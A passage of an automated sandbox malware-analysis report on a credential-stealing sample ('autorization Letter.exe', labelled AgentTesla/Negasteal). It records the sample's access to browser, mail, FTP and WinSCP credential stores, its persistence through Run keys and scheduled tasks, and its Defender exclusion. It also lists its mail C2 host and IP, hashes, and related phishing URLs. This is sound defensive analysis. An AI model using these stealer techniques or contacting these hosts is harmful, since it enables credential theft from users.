                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3346316308.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2204151615.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: autorization Letter.exe PID: 6180, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 1576, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match; File source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: autorization Letter.exe PID: 6180, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 1576, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3346316308.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2204151615.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: autorization Letter.exe PID: 6180, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 1576, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; a number in brackets is the signature-count badge the report shows next to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Windows Management Instrumentation [121]; Scheduled Task/Job [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading [1]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading [1]; Process Injection [311]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [12]; Timestomp [1]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [141]; Process Injection [311]; Hidden Files and Directories [1]
Credential Access: OS Credential Dumping [2]; Input Capture [1]; Credentials in Registry [1]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Security Software Discovery [211]; Process Discovery [1]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Input Capture [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Encrypted Channel [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [1]; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1519119; Sample: autorization Letter.exe; Start date: 26/09/2024; Architecture: WINDOWS; Score: 100)

Signatures on the whole run: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
Contacted host: mail.unitechautomations.com

Process tree (as drawn in the graph):
- autorization Letter.exe (started)
  - Dropped: C:\Users\user\AppData\Roaming\tIFjYTCo.exe (PE32); C:\Users\...\tIFjYTCo.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpF639.tmp (XML); C:\Users\user\...\autorization Letter.exe.log (ASCII)
  - Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  - RegSvcs.exe (started)
    - Network: mail.unitechautomations.com 192.185.129.60, ports 49711, 49712, 587 (UNIFIEDLAYER-AS-1US, United States)
    - Dropped: C:\Users\user\AppData\Roaming\...\GUIVTme.exe (PE32)
    - Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Hides that the sample has been downloaded from the Internet (zone.identifier)
  - powershell.exe (started)
    - Signatures: Loading BitLocker PowerShell Module
    - conhost.exe (started)
    - WmiPrvSE.exe (started)
  - powershell.exe (started)
    - conhost.exe (started)
  - schtasks.exe (started)
    - conhost.exe (started)
- tIFjYTCo.exe (started)
  - Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  - RegSvcs.exe (started)
    - Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  - schtasks.exe (started)
    - conhost.exe (started)
- GUIVTme.exe (started)
  - conhost.exe (started)
- GUIVTme.exe (started)
  - conhost.exe (started)

Source | Detection | Scanner | Label
autorization Letter.exe | 58% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
autorization Letter.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\tIFjYTCo.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\tIFjYTCo.exe | 58% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label
https://account.dyn.com/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://mail.unitechautomations.com | 0% | Avira URL Cloud | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.unitechautomations.com | 192.185.129.60 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://mail.unitechautomations.com | RegSvcs.exe, 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | autorization Letter.exe, 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | autorization Letter.exe, 00000001.00000002.2159567789.0000000003475000.00000004.00000800.00020000.00000000.sdmp; tIFjYTCo.exe, 0000000A.00000002.2225613849.000000000272A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | autorization Letter.exe; tIFjYTCo.exe.1.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.185.129.60 | mail.unitechautomations.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519119
Start date and time: 2024-09-26 07:02:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: autorization Letter.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@23/19@1/1
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 288
• Number of non-executed functions: 12
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target GUIVTme.exe, PID 5332 because it is empty
• Execution Graph export aborted for target GUIVTme.exe, PID 5744 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: autorization Letter.exe
Time | Type | Description
01:03:04 | API Interceptor | 1x Sleep call for process: autorization Letter.exe modified
01:03:09 | API Interceptor | 32x Sleep call for process: powershell.exe modified
01:03:10 | API Interceptor | 45x Sleep call for process: RegSvcs.exe modified
01:03:12 | API Interceptor | 1x Sleep call for process: tIFjYTCo.exe modified
07:03:09 | Task Scheduler | Run new task: tIFjYTCo path: C:\Users\user\AppData\Roaming\tIFjYTCo.exe
07:03:12 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
07:03:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
Match: 192.185.129.60
Associated Sample Name / URL | Detection | Threat Name
DAZZILING- ASIA PO.NO4678754.exe | malicious | AgentTesla, PureLog Stealer
Payment Copy.exe | malicious | AgentTesla, PureLog Stealer
8b1ddf6861f6e9fdd05b7e279bf0e218c41946b5162dc12d7da5cb628c98db27_dump.exe | malicious | AgentTesla
ISS GLOBAL FORWARDING UAE LLC.exe | malicious | AgentTesla, PureLog Stealer
Invoice Checklist.exe | malicious | AgentTesla, PureLog Stealer
Total Invoice.exe | malicious | AgentTesla, PureLog Stealer
CREDIT NOTE.exe | malicious | AgentTesla
Total Invoices.exe | malicious | AgentTesla
CAHKHCM2404009CFS.exe | malicious | AgentTesla
Booking_BK24-000288_19_Apr_2410_52_34 AM.exe | malicious | AgentTesla

Match: mail.unitechautomations.com
Associated Sample Name / URL | Detection | Threat Name | Context
DAZZILING- ASIA PO.NO4678754.exe | malicious | AgentTesla, PureLog Stealer | 192.185.129.60
Payment Copy.exe | malicious | AgentTesla, PureLog Stealer | 192.185.129.60
8b1ddf6861f6e9fdd05b7e279bf0e218c41946b5162dc12d7da5cb628c98db27_dump.exe | malicious | AgentTesla | 192.185.129.60
ISS GLOBAL FORWARDING UAE LLC.exe | malicious | AgentTesla, PureLog Stealer | 192.185.129.60
Invoice Checklist.exe | malicious | AgentTesla, PureLog Stealer | 192.185.129.60
Total Invoice.exe | malicious | AgentTesla, PureLog Stealer | 192.185.129.60
CREDIT NOTE.exe | malicious | AgentTesla | 192.185.129.60
Total Invoices.exe | malicious | AgentTesla | 192.185.129.60
CAHKHCM2404009CFS.exe | malicious | AgentTesla | 192.185.129.60
Booking_BK24-000288_19_Apr_2410_52_34 AM.exe | malicious | AgentTesla | 192.185.129.60

Match: UNIFIEDLAYER-AS-1US
Associated Sample Name / URL | Detection | Threat Name | Context
http://www.richfieldkennel.com/SharePointProposalFile/ | malicious | HTMLPhisher | 192.185.102.120
https://putefix.dogfriendlytahoe.com/ | malicious | Unknown | 192.185.24.110
https://albertanewsprint.dogfriendlytahoe.com/ | malicious | Unknown | 192.185.24.110
INDIA - VSL PARTICULARS.pdf.exe | malicious | AgentTesla | 50.87.144.157
https://dwr.yoh.mybluehost.me/wp-content/plugins/A/sdh/TU17HLK/ | malicious | Unknown | 50.6.153.157
https://abre.ai/k8hX | malicious | Unknown | 50.6.153.157
http://nky.beb.mybluehost.me/new/auth/entrar.php | malicious | Unknown | 50.6.153.4
https://turkiyecumhuriyetiziraatbankasi.com/ | malicious | Unknown | 162.240.37.219
https://c81df1b32e6c3c5e06e82397233e2695.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/cmVnaXN0cmF0b3JAc3Uuc2U= | malicious | HTMLPhisher | 108.179.252.203
https://aac4b0887827b3598989c48a201d0420.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/bnpheWVkaUBzdGMuY29tLnNh | malicious | HTMLPhisher | 108.179.252.203

No context

Match: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
Associated Sample Name / URL | Detection | Threat Name
rMT103SwiftCopyoFPayment.exe | malicious | AgentTesla
Shipping Document.exe | malicious | AgentTesla
COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe | malicious | AgentTesla
DHL- CBJ520818836689.pdf.exe | malicious | AgentTesla
DHL- CBJ520818836689.exe | malicious | AgentTesla
Shipping documents.exe | malicious | AgentTesla
Shipping doc.exe | malicious | AgentTesla
80c619d931fa4e5c89fe87aac0b6b143.exe | malicious | XWorm
Rejected Shipping Documents compiled PL pdf.exe | malicious | AgentTesla
Public Holiday mem_Notice 2024.exe | malicious | AgentTesla
Process: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 142
Entropy (8bit): 5.090621108356562
Encrypted: false
SSDEEP: 3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5: 8C0458BB9EA02D50565175E38D577E35
SHA1: F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256: C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512: 804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

Process: C:\Users\user\Desktop\autorization Letter.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Users\user\AppData\Roaming\tIFjYTCo.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):2232
                                                                Entropy (8bit):5.380285623575084
                                                                Encrypted:false
                                                                SSDEEP:48:+WSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8M0Uyus:+LHxvCsIfA2KRHmOugw1s
                                                                MD5:3DE8C237AE45317874CDD4A22928CCED
                                                                SHA1:5FDA59AE6DF07FE8DDAA0D3FDC17D78752C9955A
                                                                SHA-256:C7784FBFD2FC129A8F16665768CA3C17B9BCF080FFD48516E826A6B18F629A06
                                                                SHA-512:BC5397E31BE411D3154A61F270B23B51DF7F7E3812255D5F64CD16E0E62DA4C51BEDE994915055F65F49977D282BF0A5F9C66E0AD8CE869137606B703CC0E042
                                                                Malicious:false
